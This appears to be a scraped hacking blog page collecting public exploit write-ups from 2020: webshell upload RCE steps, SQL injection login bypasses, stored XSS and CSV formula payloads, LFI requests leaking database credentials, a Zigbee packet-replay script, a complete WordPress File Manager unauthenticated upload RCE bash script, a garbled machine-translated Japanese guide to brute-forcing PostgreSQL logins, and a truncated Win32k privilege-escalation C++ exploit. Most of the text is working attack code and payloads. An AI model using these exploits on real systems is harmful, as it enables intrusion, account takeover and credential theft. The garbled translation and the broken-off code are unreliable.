# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated)
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28688
---------------------
Proof of Concept:
---------------------
1. Authenticate as a user (or signup as an artist)
2. Click the drop down for your username and go to My ART+BAY
3. Click on My Artworks > My Available Artworks > Add an Artwork
4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload
5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147298
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection
# Date: 2020–11–17
# Exploit Author: Anurag Kumar Rawat(A1C3VENOM)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
# Version: 1.1
# Tested on Parrot os(Linux)
Attack Vector:
An attacker can gain admin panel access using malicious sql injection quiries.
Steps to reproduce:
1. Open admin login page using following URl:
-> http://localhost/erms/admin/index.php
2. Now put below Payload in both the fields( User ID & Password)
Payload: ' or '1'='1
3)Server accept this payload and attacker successfully bypassed admin panel
without any credentials
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28687
--------------------
Proof of Concept:
--------------------
1. Authenticate as a user (or signup as an artist)
2. Go to edit profile
3. Upload a php-shell as profile picture and click update/save
4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution
# Exploit Title: Ksix Zigbee Devices - Playback Protection Bypass (PoC)
# Date: 2020-11-15
# Exploit Author: Alejandro Vazquez Vazquez
# Vendor Homepage: https://www.ksixmobile.com/
# Firmware Version: (Gateway Zigbee Module - v1.0.3, Gateway Main Module - v1.1.2, Door Sensor - v1.0.7, PIR Motion Sensor - v1.0.12)
# Tested on: Kali Linux 2020.3
# The coordinator of the Zigbee network (Zigbee gateway) does not correctly check the sequence number of the packets that are sent to it, which allows forging messages from an end device to the coordinator (example: turn on a light bulb, open a door, ...) by injecting a very large value in the "sequence number" field.
# To exploit this vulnerability
# 1. Capture Zigbee traffic with a sniffer (Api-Mote) and save it in .pcap format
# 2. Open the file with Wireshark and locate the packet you want to forward (turn on a light bulb, open a door, ...)
# 3. Copy that packet as "hex dump" and save it to a .txt file
# 4. Modify the "sequence number" field to a high value such as 250
# 5. Convert the txt file to .pcap again
# 6. Forward the packet to the network, using a tool such as Killerbee
#!/bin/bash
function usage(){
echo -e "\nUsage: $0 [ZigbeeChannel] [SecuenceNumber] [HexDumpFile] [ShortSource] [ExtendedSource] [ShortDestination] [ShortPanId] [FCS]"
echo -e "Example: $0 11 250 Open_Door_Alert_Hex_Dump 0x0001 11:ff:11:ff:11:ff:11:ff 0x0000 0x3333 0x0000 \n"
echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
}
function message(){
echo -e "\nProof of Concept"
echo -e "There is an incorrect check of the \"sequence number\" field on Ksix Zigbee devices\n"
echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
}
function poc_playback(){
# Variables
ZIGBEE_CHANNEL=$1
SECUENCE_NUMBER=$2
HEX_DUMP_FILE=$3
SHORT_SOURCE=$4
EXTENDED_SOURCE=$5
SHORT_DESTINATION=$6
SHORT_PAN_DESTINATION=$7
FRAME_CHECK_SECUENCE=$8
declare -a first_line_array
declare -a second_line_array
declare -a last_line_array
# Change packet fields
while IFS= read -r line
do
if [[ "$line" == "0000"* ]]; then
IFS=' ' read -ra first_line_array <<< "$line"
first_line_array[0]+=" "
first_line_array[3]=$( printf "%x" $SECUENCE_NUMBER )
first_line_array[4]=${SHORT_PAN_DESTINATION:4:2}
first_line_array[5]=${SHORT_PAN_DESTINATION:2:2}
first_line_array[6]=${SHORT_DESTINATION:4:2}; first_line_array[11]=${SHORT_DESTINATION:4:2}
first_line_array[7]=${SHORT_DESTINATION:2:2}; first_line_array[12]=${SHORT_DESTINATION:2:2}
first_line_array[8]=${SHORT_SOURCE:4:2}; first_line_array[13]=${SHORT_SOURCE:4:2}
first_line_array[9]=${SHORT_SOURCE:2:2}; first_line_array[14]=${SHORT_SOURCE:2:2}
echo "${first_line_array[@]}" > Check_Secuence_Number_Incorrectly_HEX_Dump
elif [[ "$line" == "0010"* ]]; then
IFS=' ' read -ra second_line_array <<< "$line"
second_line_array[0]+=" "
second_line_array[7]=${EXTENDED_SOURCE:21:2}; second_line_array[8]=${EXTENDED_SOURCE:18:2}
second_line_array[9]=${EXTENDED_SOURCE:15:2}; second_line_array[10]=${EXTENDED_SOURCE:12:2}
second_line_array[11]=${EXTENDED_SOURCE:9:2}; second_line_array[12]=${EXTENDED_SOURCE:6:2}
second_line_array[13]=${EXTENDED_SOURCE:3:2}; second_line_array[14]=${EXTENDED_SOURCE:0:2}
echo "${second_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
elif [[ "$line" == "0030"* ]]; then
IFS=' ' read -ra last_line_array <<< "$line"
last_line_array[0]+=" "
last_line_array[11]=${FRAME_CHECK_SECUENCE:4:2}
last_line_array[12]=${FRAME_CHECK_SECUENCE:2:2}
echo "${last_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
else
echo "$line" >> Check_Secuence_Number_Incorrectly_HEX_Dump
fi
done < $HEX_DUMP_FILE
# Hex Dump file to pcap
text2pcap Check_Secuence_Number_Incorrectly_HEX_Dump Check_Secuence_Number_Incorrectly.pcap
# Playback
zbreplay --channel $ZIGBEE_CHANNEL --pcapfile Check_Secuence_Number_Incorrectly.pcap && echo -e "\nPacket sent to the network. Poc Completed.\n"
}
function main(){
if [ $# -lt 8 ]; then
echo -e "\n\t Missing arguments"
usage
exit
else
message
poc_playback $1 $2 $3 $4 $5 $6 $7 $8
fi
}
main $1 $2 $3 $4 $5 $6 $7 $8
#NOTE: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message "Door open".
# Exploit Title: DotCMS 20.11 - Stored Cross-Site Scripting
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://dotcms.com/
# Version: 20.11
# Tested on Windows 10
Vulnerable Parameters: Template Title
Steps to reproduce:
1. Login With Admin Username and password.
2. Navigate to Site --> Template --> Add Template Designer
2. Entre the payload <script>alert(document.cookie)</script> in Template
Title.
3. Now Navigate to Site --> Template. We could see that our payload gets
executed. And hence it executed every time.
# Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
# Date: 18-11-2020
# Exploit Author: Aakash Madaan
# Vendor Homepage: https://webdamn.com/
# Software Link : https://webdamn.com/user-management-system-with-php-mysql/
# Version: N/A (Default)
# Tested on: Windows 10 professional
Steps to reproduce:
1. Open user login page using following URl:
-> http://localhost/login.php <http://localhost/login.html>
2. If attacker get access to valid email address ( leaked data or by any
other means) then he/she can use the email address as follows:
Payload: <email>' OR '1'='1
NOTE: Use the above payload in both username and password fields
3. Server accepts the payload and the attacker is able to bypass the user
login panel with only email address.
#Exploit Title: ChurchCRM 4.2.1- CSV/Formula Injection
#Date: 2020- 10- 24
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.0
#Payload: =10+20+cmd|' /C calc'!A0
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
List Event Types feature in ChurchCRM v4.2.0 via Name field that is
mistreated while exporting to a CSV file.
To exploit this vulnerability:
1. Login to the application, goto 'Events' module and then "List Event
Types"
2. Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the
'Name' field
3. Now goto 'List Event types' module and click CSV to download the CSV
file
4. Open the CSV file, allow all popups and our payload is executed
(calculator is opened).
#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
#Date: 2020- 10- 29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:
1. Login to the application, go to 'View all Deposits' module.
2. Add the payload ( <script>var link = document.createElement('a');
link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = ''; document.body.appendChild(link); link.click();
</script>
) in the 'Deposit Comment' field and click "Add New Deposit".
3. Payload is executed and a .exe file is downloaded.
# Exploit Title: Simple College Website 1.0 - 'page' Local File Inclusion
# Date: 30-10-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + version: Apache/2.4.46 (Debian)
# CVE ID : N/A
# Local File Inclusion
#parameter Vulnerable: page
#Request
GET /college_website/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=7ls9j695lglc2eah5khecv2g66
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
#Response
HTTP/1.1 200 OK
Date: Sat, 31 Oct 2020 02:49:31 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15674
Connection: close
Content-Type: text/html; charset=UTF-8
<main class="">
PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjb2xsZWdlX3dlYnNpdGVfZGInKW9yIGRpZSgiQ291bGQgbm90IGNvbm5lY3QgdG8gbXlzcWwiLm15c3FsaV9lcnJvcigkY29uKSk7DQo=
</main>
#Exploit Title: Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality
#Date: 2020-11-11
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://www.anuko.com/
#Software Link: https://www.anuko.com/time-tracker/index.htm
#Version: 1.19.23.5311
#Tested on: Kali Linux 2020.3
#CVE: CVE-2020-27423
#Proof Of Concept:
Anuko Time Tracker v1.19.23.5311 and prior, lacks rate limit on the
password reset module which allows attackers to perform Denial of Service
attack on any legitimate user's mailbox. Attacker could perform Denial of
Service on a legitimate user's mailbox
To exploit this vulnerability:
1. Goto 'Password Reset' module and enter any user's login name
2. Click on 'Reset Password' and capture this request.
3. Replay this request n number of times.
4. The victim receives a password reset email the number of times the
request is replayed.
# Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure
# Date: 2003-07-28
# Exploit Author: Andrea Intilangelo (acme olografix / paranoici)
# Vendor Homepage: www.mitel.com
# Version: mitel-cs018
# Tested on: Windows, Linux
There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
Username: mitel-cs018
Password:
ERROR: Invalid Username/Password pair
Username:
Password:
Username: ^X^W^E^Q^W
Password:
ERROR: Invalid Username/Password pair
Username: Password:
ERROR: Invalid Username/Password pair
# in this moment a foreign call arrive from outside
Username: 155 OGIN 149 11:11:55 D 2
156 ICIN 11:12: 6 D 4 0xxxXxxxxx
157 XFIC 156 11:12: 6 151 0: 9:47 D 3
158 ICIN 11:12: 6 D 3 0xxxXxxxxx
159 ANSW 146 11:12:11 0: 0: 9 D 4
160 HDIN 146 11:12:21 D 4
162 HREC 146 11:12:27 0: 0: 6 D 4
163 ABND ? 11:12:37 0: 0:37 D 3 0xxxXxxxxx
164 ICIN 11:12:43 D 3 0xxxXxxxxx
165 EXIC 146 11:12:54 0: 0:47 D 4
166 ANSW 146 11:13: 0 0: 0:16 D 3
167 HDIN 146 11:13: 6 D 3
169 EXIC 146 11:13:13 156 0: 0:12 D 3
171 EXOG 149 11:13:46 0: 1:59 D 2 0xxXxxxxx
172 XFIC 156 11:16:53 146 0: 3:40 D 3
# where "0xxXxxxxx" are telephone numbers
A derives table results is:
SEQ CODE EXT ACC TIME RX TX DURATION LN DIALLED DIGITS COST
No. No. COD HH:MM:SS FROM TO HH:MM:SS No.
___ _____ ____ ____ ________ ____ ____ ____________ ______________ _______
#Exploit Title: Anuko Time Tracker 1.19.23.5311 - Password Reset Vulnerability leading to Account Takeover
#Date: 2020-11-11
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://www.anuko.com/
#Software Link: https://www.anuko.com/time-tracker/index.htm
#Version: 1.19.23.5311
#Tested on: Kali Linux 2020.3
#CVE: CVE-2020-27422
#Proof Of Concept:
In Anuko Time Tracker v1.19.23.5311 and prior, the password reset link
emailed to the user doesn't expire once used, hence the attacker could use
the same link to take over the victim's account. An Attacker needs to have
the link for successful exploitation. A malicious user could use the same
password reset link of the victim multiple times to take over the account.
To exploit this vulnerability:
1. Goto 'Password Reset' module and enter any user's login name
2. Reset the password using the password reset link received in the email
3. Use the same link again after resetting the password once
4. Password is changed again using the previously used link.
# Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include
# Date: 22-10-2020
# Exploit Author: Mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: parrot + Apache/2.4.46 (Debian)
SQL Injection
#Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4
#POC 1:
http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users--
LFI
#Vulnerable Page1: http://localhost/carRental/index.php?page=about
#Vulnerable Page2:http://localhost/carRental/admin/index.php?page=movement
#POC 1:
http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home
#POC 2:http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect
note POC 2 reading database information
#example :
curl -s -i POST http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect | grep view-panel -A 1
#result
<main id="view-panel" >
PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K
#proof of concept picture
https://ibb.co/8Dd7d9G
# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE
# Date: September 4,2020
# Exploit Author: Mansoor R (@time4ster)
# CVE: CVE-2020-25213
# Version Affected: 6.0 to 6.8
# Vendor URL: https://wordpress.org/plugins/wp-file-manager/
# Patch: Upgrade to wp-file-manager 6.9 (or above)
# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04
#!/bin/bash
#Description:
#The core of the issue began with the File Manager plugin renaming the extension on the elFinder library’s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used “as-is” without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file
#Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution.
#Patch commit details:
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=
#Reference
#https://nvd.nist.gov/vuln/detail/CVE-2020-25213
#Credits:
#1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
#2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
##WARNINGS:
#Only test the exploit on websites you are authorized to.
#Don't upload reverse shell payloads or any files that can cause harm to organization.
#Also note that the uploaded files can be accessed by anyone unless secured by password.
## Usage:
# ========
# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress --check
#
# ============================================================================================
# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]
#
# By: Mansoor R (@time4ster)
# ============================================================================================
#
# [+] Found wp-file-manager version: 6.0
# [+] Version appears to be vulnerable
# [+] Target: http://192.168.1.54/wordpress is vulnerable
#
# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress -f /tmp/mypoc.php --verbose
#
# ============================================================================================
# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]
#
# By: Mansoor R (@time4ster)
# ============================================================================================
#
# curl POC :
# curl -ks --max-time 5 --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@//tmp/mypoc.php" "http://192.168.1.54/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
#
# [+] W00t! W00t! File uploaded successfully.
# Location: /wordpress/wp-content/plugins/wp-file-manager/lib/php/../files/mypoc.php
# Exploit
#==========
echo
echo "============================================================================================"
echo "wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]"
echo
echo "By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo
function printHelp()
{
echo -e "
Usage:
-u|--wp_url <string> Wordpress target url
-f|--upload_file <string> Absolute location of local file to upload on the target. (relative path will not work)
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
Example:
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
"
}
check="false"
verbose="false"
#Processing arguments
while [[ "$#" -gt 0 ]]
do
key="$1"
case "$key" in
-u|--wp_url)
wp_url="$2"
shift
shift # past argument
;;
-f|--upload_file)
upload_file="$2"
shift
shift
;;
-k|--check)
check="true"
shift
shift
;;
-v|--verbose)
verbose="true"
shift
;;
-h|--help)
printHelp
exit
shift
;;
*)
echo [-] Enter valid options
exit
;;
esac
done
[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL." && exit
[[ -z "$upload_file" ]] && [[ "$check" == "false" ]] && echo "[-] Either supply --upload_file or --check" && exit
[[ -n "$upload_file" ]] && [[ ! -s "$upload_file" ]] && echo "[-] File supplied is either empty or not exist." && exit
#Script have dependency on jq
jq_cmd=$(command -v jq)
[[ -z "$jq_cmd" ]] && echo -e "[-] Script have dependency on jq. Insall jq from your package manager.\nFor debian based distro install using command: apt install jq" && exit
function checkWPFileManagerVersion()
{ #Takes 1 argument: url
declare url="$1"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/readme.txt"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
declare is_vulnerable="true"
#declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i "Stable tag: ")
declare version=$( curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -A 5 "== Changelog ==" | grep -E -o "[0-9]\.[0-9]" | head -n 1 )
if [ -n "$version" ];then
#declare version=$(echo "$response" | awk {'print $3'})
echo "[+] Found wp-file-manager version: $version"
patched_version="6.9"
#if [ $(awk 'BEGIN {print ('$version' > '6.9'}') ]; then
smaller_version=$(echo -e "$version\n$patched_version" | sort -n | head -n 1)
if [ "$version" != "$patched_version" ] && [ "$smaller_version" == "$version" ];then
echo "[+] Version appears to be vulnerable"
else
echo "[-] Version don't appears to be vulnerable"
is_vulnerable=false
fi
else echo "[-] Unable to detect version. May be wp-file-manager plugin not installed."
is_vulnerable=false
fi
if [ "$is_vulnerable" == "false" ];
then
echo -n "Do you still want to continue (y/N) : "
read choice
[[ "$choice" == "y" ]] || [[ "$choice" == "Y" ]] && echo && return
exit
fi
}
function checkWPFileManager()
{ #Takes 1 argument: url
declare url="$1"
#Checking wp-file-manager plugin version:
checkWPFileManagerVersion "$url"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint")
#echo "$response"
#{"error":["errUnknownCmd"]} is returned when vulnerable endpoint is hit
declare is_vulnerable=$(echo "$response" | grep "\{\"error\":\[\"errUnknownCmd\"\]\}")
[[ -n "$is_vulnerable" ]] && echo "[+] Target: $url is vulnerable"
[[ -z "$is_vulnerable" ]] && echo "[-] Target: $url is not vulnerable"
}
function exploitWPFileManager()
{ #Takes 3 arguments: url & file_upload & verbose(true/false)
declare url="$1"
declare file_upload="$2"
declare verbose="$3"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
if [ "$verbose" == "true" ];then
echo "curl POC :"
echo "curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"$target_endpoint\" "
echo
fi
response=$(curl -ks --max-time 5 --user-agent "$user_agent" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" \
-F "upload[]=@/$file_upload" \
"$target_endpoint" )
#echo "$response"
file_upload_url=$(echo "$response" | jq -r .added[0].url 2>/dev/null)
[[ -n "$file_upload_url" ]] && echo -e "[+] W00t! W00t! File uploaded successfully.\nLocation: $file_upload_url "
[[ -z "$file_upload_url" ]] && echo "[-] File upload failed."
}
[[ "$check" == "true" ]] && checkWPFileManager "$wp_url"
[[ -s "$upload_file" ]] && exploitWPFileManager "$wp_url" "$upload_file" "$verbose"
echo
最初の方法Hydra:
Hydraは通常、Telnet、Postgres、HTTP、HTTPS、SMBサービス、さまざまなデータベースを含む50を超えるプロトコルに対して高速辞書のブルートフォース攻撃を実行できます。これで、辞書ライブラリを選択する必要があります。他の辞書パスワード攻撃と同様に、辞書が重要です。 Kaliの下には、同様のパスワード辞書ライブラリがたくさんあります。
次のコマンドを実行します。
Hydra –l/root/desktop/user.txt –p/root/desktop/pass.txt 192.168.1.120 postgresパラメーター:L:ユーザー名辞書ライブラリ(CAPS)のパスを表します-P:パスワードディクショナリーライブラリ(CAPS)のパスのパスを表します。見たように、以下は、Postgresユーザー名がPostgresユーザー名としてPostgresとしてパスワードとして正常に取得されていることを示しています。
2番目の方法xhydra:
これは、ポート5432を介してパスワード辞書攻撃を通じてクラックされるPostgresデータベースシステムのグラフィカルバージョンです。この方法を使用するには、kaliシステムで最初にxhydraを開いて、「シングルターゲット」を選択してからターゲットホストに記入します。プロトコルでPSTGRESプロトコルを選択し、ポートで5432を選択します。
次に、[ユーザー名]タブに移動し、[ユーザー名]リストを選択し、下のボックスにユーザー名を使用して辞書ファイルへのパスを入力します。次に、「パスワードリスト」を選択し、テキストファイルの下のボックスに辞書パスワードを入力します。
これを行ったら、[開始]タブに移動し、左側の[スタート]ボタンをクリックします。これで、パスワード辞書攻撃のプロセスが開始されます。したがって、正しいユーザー名とパスワードが取得されます。
3番目の方法メデューサ:
Medusaは、高速で大規模な同時、モジュール式のログイン爆発アーティファクトであることを目指しています。 AFP、CVS、POSTGRES、HTTP、IMAP、RLOGIN、SSH、Subversion、VNCなどの多くのプロトコルをサポートしています。
次のコマンドを実行します:Medusa -H192.168.1.120 -U /Root/desktop/user.txt-p /root/desktop/pass.txt -mpostgresパラメーター:-u:ユーザー名辞書ライブラリ-p:パスワードdictionaryライブラリへのパスは、パスワードのように、パスワードとしてのパスワードを取得します。
4番目の方法ncrack:
NCRACKは、高速ネットワーク認証クラッキングツールです。これは、企業がパスワードについてすべてのホストとネットワークデバイスを積極的にテストすることにより、脅威からネットワークを保護するのに役立つように設計されています。
次のコマンドを実行します。
ncrack-v -u /root/desktop/user.txt-p /root/desktop/pass.txt 192.168.1.120:5432パラメーター:
U:ユーザー名リストを表すパス-P:パスワードリストを表すパスが表示されているように、ポストグレスとしてのユーザー名とpostgresとしてパスワードを正常に取得しました。
5番目の方法パテーター:
Patatorは、モジュラー設計を採用し、柔軟性のある使用可能な多機能バーストツールです。 Postgres、HTTP、SMBなどの複数のプロトコルポートでのブルートフォース攻撃に非常に役立ちます。
コマンドは次のとおりです。PGSQL_LOGINHOST=192.168.1.120ユーザー=file0 0=/root/desktop/user.txtパスワード=file1 1=/root/desktop/pass.txt 
以下に示すスクリーンショットから、パスワード辞書攻撃のプロセスを確認できるため、正しいユーザー名とパスワードが取得されます。
6番目の方法メタプロイト:
このモジュールは、3つのパラメーターオプションuser_file、pass_file、userpass_fileで示されるユーザー名とパスワードの組み合わせを使用して、postgreSQLインスタンスを認証しようとします。パスワードは、プレーンテキストまたはMD5形式のハッシュにすることができることに注意してください。
kali端子を開き、コマンドを入力します。MSFConsoleはモジュールを使用するようになりました。
MSF Exploit(scanner/postgres/postgres_login)rhosts 192.168.1.120(リモートホストのIP)
MSF Exploit(scanner/postgres/postgres_login)set user_file /root/desktop/user.txtmsf exploit(scanner/postgres/postgres_login)set userpass_file/root/desktop/pass.txtmsf exploit(scanner/setgris_login truemsf exploit(scanner/postgres/postgres_login)以下のスクリーンショットからエクスプロイトすると、Postgresのユーザー名とパスワードが正常に取得されていることがわかります。
wiz_tmp_tag id='wiz-table-range-border' contentedable='false' style='display: none;'
# Exploit Title: Microsoft Windows - Win32k Elevation of Privilege
# Author: nu11secur1ty
# Date: 08.03.2020
# Exploit Date: 01/14/2020
# Vendor: Microsoft
# Software Link: https://support.microsoft.com/en-us/help/3095649/win32k-sys-update-in-windows-october-2015
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/raw/master/Undefined/CVE-2020-0624/win32k/__32-win32k.sys5.1.2600.1330.zip
# CVE: CVE-2020-0642
[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source: readme from GitHUB
[Exploit Program Code]
// cve-2020-0624.cpp
#pragma warning(disable: 4005)
#pragma warning(disable: 4054)
#pragma warning(disable: 4152)
#pragma warning(disable: 4201)
#include <Windows.h>
#include "ntos.h"
typedef NTSTATUS(NTAPI* PFNUSER32CALLBACK)(PVOID);
HWND hParent{}, hChild{};
BOOL Flag1{}, Flag2{};
PFNUSER32CALLBACK OrgCCI2{}, OrgCCI3{};
NTSTATUS NTAPI NewCCI2(PVOID Param)
{
if (Flag1)
{
Flag1 = FALSE;
Flag2 = TRUE;
DestroyWindow(hParent);
}
return OrgCCI2(Param);
}
NTSTATUS NTAPI NewCCI3(PVOID Param)
{
if (Flag2)
{
ExitThread(0);
}
return OrgCCI3(Param);
}
int main()
{
DWORD OldProtect{};
PTEB teb = NtCurrentTeb();
PPEB peb = teb->ProcessEnvironmentBlock;
PVOID pCCI2 = &((PVOID*)peb->KernelCallbackTable)[2];
if (!VirtualProtect(pCCI2, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
return 0;
